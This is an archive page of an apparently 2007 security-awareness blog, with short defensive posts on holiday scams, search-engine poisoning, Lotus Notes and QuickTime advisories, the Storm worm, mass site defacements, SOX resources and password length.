|
Sharing Security Developments, and Best Practices for corporate and home users
November 2007 - Posts
-
Minyanville is a neat site that offers stock market and investment tips. These 6 tips are excellent in avoiding scam artists that try to take advantage of this business season.
Holiday Safety Tips - Don't Fall Prey to Holiday Scams http://www.minyanville.com/articles/index/a/14897
QUOTE: The holidays bring good cheer, mistletoe – and scam artists. Holiday scammers play on your trusting nature, desire for a bargain and “urgent need” to update your financial information in their continuing quest to separate you from your money. Keep an eye out for these holiday scams:
1. Avoid E-Card greetings 2. Phony Sign-Up Tables at the mall or other public places offering charge cards 3. Emails requesting "Account information needed" 4. Emails, phone calls, or regular mail claiming "You are the winner" 5. Emails or regular mail claiming that "You are approved for credit cards" 6. Other telemarketing scams
SUMMARY: Just remember what your mother taught you: If it’s too good to be true, it’s a scam. Keep that in mind and no crook will spoil your holiday.
|
-
This advice is excellent for better ensuring safety while shopping online during the holidays.
QUOTE:
5 Ways To Increase Safety While Shopping Online
1. Shop from Reliable Retailers. It's wise to do business with companies you already know and trust. If the retailer is unfamiliar, look up information on the company with the Better Business Bureau or the Office of the State Attorney General in the state where the seller is located.
2. Use a Credit Card, Not a Debit Card Online. Credit cards limit your liability for unauthorized charges to $50. You're not assured this protection with a debit card.
3. Ask about Single Use Credit Cards. Some credit card companies use a new technology that allows them to issue a single use credit card number for online purchases. With this number, you avoid having to use your real credit card number online, so security isn't jeopardized.
4. Avoid Buying On Public Computers. A hacker or thief can easily put a keylogger on a public computer that allows him or her to know everything you've typed — including your credit card numbers and passwords. Stay away from public access computers when shopping!
5. Don't Save Your Credit Card Numbers Online. Many reputable sites give you the option to save credit card numbers online to make future purchases easy. However, if the company's database is ever successfully hacked, your information could be exposed. It's safer to re-enter your numbers with each transaction.
Webroot Safe Holiday Shopping Guide - (PDF format, 16 pages, 1.8MB) http://www.webroot.com/pdf/Webroot_HolidayShopping_USA_1107.pdf
|
-
I may have spoken too soon, as a new batch of .cn sites are starting to show up, according to Sunbelt
Internet Search poisoning - 2nd wave could be on the way?
Sunbelt is reporting new seedings for the .cn domain (China) oriented websites in Google (and this could possibly show up in other search engines). The sites are not launching exploit attacks yet, but this could change.
What to avoid: Avoid unusual sites with random letter/number combos, numerical IP addresses, and sites which end in a domain name of "cn" from Internet searches.
Sunbelt: HEADS UP: More Google poisoning on the way? http://sunbeltblog.blogspot.com/2007/11/heads-up-more-google-poisoning-on-way.html
quote:
Google has removed the sites responsible for the recent massive Google poisoning attack. However, we’re seeing indications that another attack may be on the way. We have seen another spate of websites freshly registered, using the similar .cn domains. There seem to be two different groups here. Right now, we’re not seeing either site serve exploits, as we saw in the last attack. However, this could change.
|
-
-
-
Some updates are noted below on this very serious threat related to malicious web sites that may be offered from Internet searches (e.g., Google). Numerous malicious pages are being created in a manner that they will appear prominently on the 1st few pages of a search (e.g., ranked high in order of appearance from a search and the malware gang appears to be keyed in on Google's site ranking methodology).
Below is some excellent advice from Sandi on what to avoid:
http://msmvps.com/blogs/spywaresucks/archive/2007/11/27/1359221.aspx
QUOTE: Take a close look at the URLs for the malware links; they are all random collections of letters and numbers, and they're all Chinese domains. Users of Google (and other web search engines) need to pay close attention to the links that are being offered, and avoid anything that just doesn't look right, and certainly avoid 'nonsense' domains like those in the Sunbelt screenshots
Below is the latest update from Sunbelt on this threat:
http://sunbeltblog.blogspot.com/2007/11/malware-redirects-aftermath_27.html
QUOTE: Sunbelt Software has uncovered tens of thousands of individual pages that have been meticulously created with the goal of obtaining high search engine ranking. Just about any search term you can think of can be found in these pages.
Sunbelt is classifying this particular threat as follows in CounterSpy:
SCAM.IWin Malware Family http://research.sunbelt-software.com/threatdisplay.aspx?name=Scam.Iwin&threatid=43561
QUOTE: Scam.Iwin is created by a browser exploit for the purpose of transmitting false clicks to internet URLs. The victim's computer is used to generate income for the attacker in a pay-per-click affilate program by transmitting false clicks to the attacker's URLs without the user's knowledge. The infected Scam.Iwin files are not ordinarily visible to the user. The files are executed and run silently in the background when the user starts the computer and/or connects to the internet. Scam.Iwin is thought to be related to CoolWebSearch.
Original post from yesterday:
http://myitforum.com/cs2/blogs/hwaldron/archive/2007/11/27/internet-searches-massive-number-of-redirects-to-malicious-sites.aspx
|
-
If the "123" extension type (Lotus 1-2-3 spreadsheet format) is not being used, this might be valuable to add to the email attachment blocking list used by Lotus Notes shops. There are some workarounds for version 5 and 7 and IBM may have a version 6 solution by the end of the month.
Lotus Notes - vulnerable to attack thru "123" extension http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9049439 http://www-1.ibm.com/support/docview.wss?rs=475&uid=swg21285600
QUOTE: Sebastián Muñiz from the CORE IMPACT Exploit Writers Team (EWT) at Core Security Technologies contacted IBM® Lotus® to report a potential keyview buffer overflow vulnerability in Lotus Notes® when viewing a Lotus 1-2-3 (.123 extension) file attachment. In specific situations it was found that the possibility exists to execute arbitrary code.
To successfully exploit this vulnerability, an attacker would need to send a specially crafted Lotus 1-2-3 file attachment to users, and the users would then have to double-click and View the attachment.
|
-
There are a number of new features and improvements that the next version of SQL Server will provide when it is released in 2008.
MVP Brad McGehee discusses the ins and outs of SQL Server 2008 http://searchwinit.techtarget.com/originalContent/0,289142,sid1_gci1283694,00.html
QUOTE: With the release of the recent SQL Server 2008 Community Technology Preview, and a final product expected in the second half of 2008, SQL Server MVP Brad McGehee shared some of his insights with SearchWinIT.com on the product's complexity, what's new for IT managers and DBAs and where the database still needs a little work.
|
-
Sunbelt posted this cautionary note today noting that folks should be careful when selecting links provided from an Internet search. One theory for the seeding might be malicious links posted in blogs, forums or other community sources? Given the dangers of email and hostile URLs, it's important for folks to stay as up-to-date as possible on security patches, AV protection, and old fashioned common sense
BREAKING: Massive amounts of malware redirects in searches http://sunbeltblog.blogspot.com/2007...f-malware.html
QUOTE: We’re seeing a large amount of seeded search results which lead to malware sites. These are using common, innocent terms — one researcher landed on a malware site through searching for alternate firmware for a router.
|
-
Quicktime and possibly iTunes processing could be affected by malformed RSTP headers found in QT music formats. Users should be careful with email attachments and website visitation, plus watch for any forthcoming QT updates, as Apple will most likely patch this serious vulnerability promptly.
Apple QuickTime and iTunes Critical Vulnerabilities http://secunia.com/advisories/27755/ http://isc.sans.org/diary.html?storyid=3690 http://www.frsirt.com/english/advisories/2007/3984 http://www.kb.cert.org/vuls/id/659761 http://www.f-secure.com/weblog/archives/00001325.html
QUOTE: Apple QuickTime contains a stack buffer overflow vulnerability in the way QuickTime handles the RTSP Content-Type header. This vulnerability may be exploited by convincing a user to connect to a specially crafted RTSP stream. Note that QuickTime is a component of Apple iTunes, therefore iTunes installations are also affected by this vulnerability. We are aware of publicly available exploit code for this vulnerability.
ISC UPDATE-1: We have received a report that exploits are now working for Vista, XP, IE6, IE7, and Safari 3.0 on Windows. Keep in mind that other attack vectors may be vulnerable as well.
ISC UPDATE-2: Firefox has been reported as an exploit vector as well.
|
-
While these 10 tips shared in an Information Week article require some work, they will help ensure safety both at home and while on the road as well:
Wireless Security - 10 tips to secure your laptop http://www.informationweek.com/news/showArticle.jhtml?articleID=203102748
QUOTE: Whether you're home or on the road, these security steps will help protect you and your computer from wireless scoundrels:
1. Make sure you are connecting to the right network. 2. Secure your connection. 3. Use frequency settings that are different from others 4. Find the strongest signals 5. Turn off your wireless network adapter when you are on the plane 6. Use whole disk encryption on your laptop 7. If you are having trouble connecting to a network, trying rebooting Windows 8. Make sure you have a firewall and it is running 9. Pick your hotspot connection and your supplier carefully 10. Finally, don't blithely accept SSL certificates and SSH public keys
|
-
-
-
-
The following resources are excellent in defining the requirements related to SOX 404 IT controls:
SOX 404 Powerpoint presentation by EKS&H (11 slides, 820KB) selecting this link will download this PPT file http://www.hftpcoloradofrontrange.org/dwnlds/HFTP_SOX_Presentation.ppt
SOX 404 PDF detailed requirements by KPMG (48 pages, 880kb) http://www.kpmg.com/aci/docs/PCAOB_S-O_404_v9.pdf
ISACA - Free PDF version of COBIT 4.0 http://www.sarbanes-oxley-forum.com/modules.php?name=Forums&file=viewtopic&t=1920
QUOTE: The ISACA is now offering a free PDF versions of COBIT 4.0, (plus the older 3.0 standards as well). You'll need to follow the registration process through and once you become a member you can login and obtain a PDF copy. There are also additional benefits and documents if you become a paid member of ISACA. Many external audit firms use COBIT standards to ensure SOX 404 requirements are met. This free benefit can help folks get started with key IT standards they may need to implement to safeguard their financial systems
|
-
Please beware of any spam emails that contain Geocites links, as this is the lastest storm worm tactic 
Storm Worm - now uses Geocities based links http://blog.trendmicro.com/storm-brews-over-geocities/
QUOTE: Storm is back, and according to TrendLabs researchers, the infamous malware family has added yet another twist to their tactics. “It looks like Google will have its hands full in the next couple of days,” Senior Threat Researcher Ivan Macalintal says. “There are limited reports that the Storm worm may be spamming emails with links to a Geocities site. This was seen in the monitoring of the spam templates being sent via Storm communications to its botnets.”
This newest chapter in the Storm saga proves that the creators of the said malware are still very much active. Its use of a popular free server like Geocities and disguising itself as a plug-in may mean that they are still looking for more systems to infect.
|
-
-
This article from Government Computer News provides a good high level summary of key features, which include:
- Firewall on by default - Bitlocker capabilities - Network Access Protection (NAP) - Internet Information Server 7 (IIS7) - Remote management improvements - Read-only Domain Controllers - Enhanced authentication in Active Directory environment
GCN Article: Windows Server 2008 provides improved security http://www.gcn.com/online/vol1_no1/45401-1.html
QUOTE: Microsoft Corp. unveiled a significantly more secure server operating system in showcasing its new Windows Server 2008 last week at the Microsoft Windows Server Technical Summit held in Redmond, Wash.
|
-
Spam authors continue to craft highly convincing schemes. For example, they can use disposable phones and even spoof the caller-ID display number so it appears to be officially coming from a bank or credit union. They may ask for highly confidential information (e.g., SSN, bank account, credit cards). Finally, if information is revealed, they can use this in identity theft or direct fraud attacks
The specific attack documented by the Internet Storm Center is one where the email recipient appears to have their credit card or bank account locked out due to highly unusual activity. If individuals panic and rely on these email messages, the phone call may appear to be legitimate as they provide sensitive details related to their accounts. Later, they may become victims where it could weeks or months to straighten these matters out.
If you receive phone numbers in suspicious documents and are unsure, contact the bank or firm directly using the publicly listed phone numbers in the phone directory or at their official websites instead.
Social Engineering Techniques - Don't call phone numbers in spam email http://isc.sans.org/diary.html?storyid=3639
QUOTE: From an awareness point of view to your customers and users:
* not only to teach your users not to follow links in (possible) phishing messages, but to use bookmarked URLs instead
* but to also tell them to use only contact data from a safe location (and especially nothing originating directly or indirectly from the email message itself)
Below is also an excellent site to help validate toll free numbers, where the caller-ID information is listed as Private or Unavailable
Site listing Suspect Toll Free Phone Numbers http://800notes.com/
News related Toll Free calls http://800notes.com/articles/NewsList.aspx
Best Practices - Toll Free Calls http://800notes.com/articles/ArticleList.aspx
|
-
-
This is shared more in interest that you can never be too careful, even with a brand new hard drive from the factory.
Seagate - A few Maxtor 3200 hard drives may contain a virus http://www.infoworld.com/article/07/11/12/Seagate-ships-virus-laden-hard-drives_1.html
QUOTE: Seagate is warning that a "small number" of its Maxtor Basics Personal Storage 3200 hard drives recently shipped with the Virus.Win32.AutoRun.ah virus, malicious software that "searches for passwords for online games and sends them to a server located in China," according to a note posted on the Seagate Web site. Only drives purchased since August 2007 are affected, Seagate said. The hard drive maker is blaming an unnamed subcontractor, located in China, for the problem.
|
-
Below is an interesting commentary related to the SOX regulatory requirements which are imposed on all publicly traded companies in the United States. While I personally feel there have been many benefits, SOX has been costly. Some of the requirements have also been sometimes difficult (e.g., SOX 404) which have excerbated the overall cost factors. Hopefully, the forthcoming changes will help alleviate some of these costs
MARKETWATCH: Sarbanes-Oxley turns 5 amid mixed results http://www.marketwatch.com/news/story/sarbanes-oxley-turns-five-proponents-see/story.aspx?guid=%7B864E903B%2D7DED%2D4544%2DAD41%2D9DD5BFC5173E%7D
QUOTE: SAN FRANCISCO (MarketWatch) -- Congress enacted Sarbanes-Oxley in 2002 in the wake of the spectacular collapse of Enron Corp. in an accounting scandal. The collapse led to the demise of auditor Arthur Andersen, one of the "Big Five" accounting industry giants.
Soon after Enron imploded, telecom giant WorldCom blew up in its own accounting scandal. It was with WorldCom in mind that lawmakers added the now infamous section 404 to SOX, which requires that chief executives and chief financial officers personally certify that financial statements are complete and accurate, under penalty of jail time. The kicker has been the responsibility of auditors to attest to management's assertions, which critics contend led to additional cost burdens.
A survey released this year by the Financial Executives Research Foundation revealed that the average 2006 cost for SOX compliance was $1.2 million at publicly-traded companies for auditor attest statements alone. If this estimate, which did not factor in money spent on internal preparation, was to include all filers at more than 15,000 public concerns, it would equal about $180 billion in 2006 costs.
|
-
Web Site Defacements using obuscated script attacks affect 52,000 pages This web server based attack has impacted several sites recently. While these are most likely less mainstream sites, folks should be cautious with email links or web site visitation 
http://isc.sans.org/diary.html?storyid=3621
QUOTE: Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (obfuscated) had been injected in over 40,000 pages across the internet, covering around 150 domains which we so far know of. This script generates a page containing several hidden iframe components. These link to other pages that contain browser specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers, and executes them on vulnerable systems.
http://isc.sans.org/diary.html?storyid=3625
UPDATE: The good news so far is that the executable being downloaded seems to be detected by most AV products. The sad news is that when I checked the other day the number of infected sites was about 30K and now about 52,000 sites.
|
-
-
-
-
H] Paul Laudanski, founder of the Castlecops, reports that an estimated $150 million in losses have been prevented through the work of the PIRT team in "frying phish" and even taking down malicious web sites. While Castlecops promotes awareness like many security firms, they go the extra mile in reporting malware to authorities and even working to combat hostile attacks (e.g., phishing, malware, and spam).
These efforts are greatly appreciated in making email and the Internet a little safer through the efforts of all the teams participating there. I've also been a member of Castlecops for a couple of years and assist in sharing new security developments and best practices in the forums.
Castlecops PIRT - Prevented over $150 Million in Phishing attack losses http://www.castlecops.com/a6843-PIRT_has_prevented_over_150_Million_US_in_Stolen_Monies.html http://www.castlecops.com/article-topic-66.html
QUOTE: Since May 2006, our Phishing Incident Reporting and Termination team has directly prevented more than $80 million in credit card losses, and indirectly an additional $75 million by working with our partners. We've shut down not only phish sites, but drops all the while preserving evidence for law enforcement. And we need your help by donating your time as handlers to keep on investigating phish crimes so we can continue to prevent even greater numbers. PIRT right now is receiving around 47,000 unique phish submissions per month. Our PIRT handlers are doing amazing work and trailblazing new roads in phish investigations and intelligence.
Some of the key services provided by Castlecops include:
PIRT - Phishing Incident Reporting and Termination http://www.castlecops.com/pirt
MIRT - Malware Incident Reporting and Termination http://www.castlecops.com/mirt
SIRT - Spam Incident Reporting and Termination http://www.castlecops.com/sirt
Castlecops - Free Technical and security forums http://www.castlecops.com/forums.html
Castlecops - Advanced Malware Removal (HiJackThis analysis) http://www.castlecops.com/HijackThis.html
|
-
In testing internal corporate security in the past, I've also seen that longer passwords require more time to crack than shorter ones. Every character added to the password length better protects you. Using LophtCrack, CAIN, and other password testing tools I had also run experiments on password lengths from 3 through 8 characters. While the 3 character passwords would be found almost instantly, times increased exponentially for each subsequent test as the password grew in size.
Both complexity and length are important. The point of the blog post is that a short complex password may not offer sufficient protection even though in human terms it may seem more difficult to guess. Password strength is all about increasing combinations and permutations of character strings and longer passwords make the difference. It might be good to ensure all passwords are eight or more characters.
http://www.avertlabs.com/research/blog/index.php/2007/11/02/password-policy-length-vs-complexity/
QUOTE: The bottom line:
* In general, password length trumps password complexity. This applies to both cracking and rainbow table attacks.
* Given the opportunity, users will choose the simplest passwords, such as ‘Password1!’
* Make sure you account for human tendencies that include usernames in passwords, too many repeating characters, passwords based on dictionary words, capitalization of the first letter, symbols & digits at the end, etc.
* Enforce your password policy
|
-
-
More Posts Next page »
|
|
|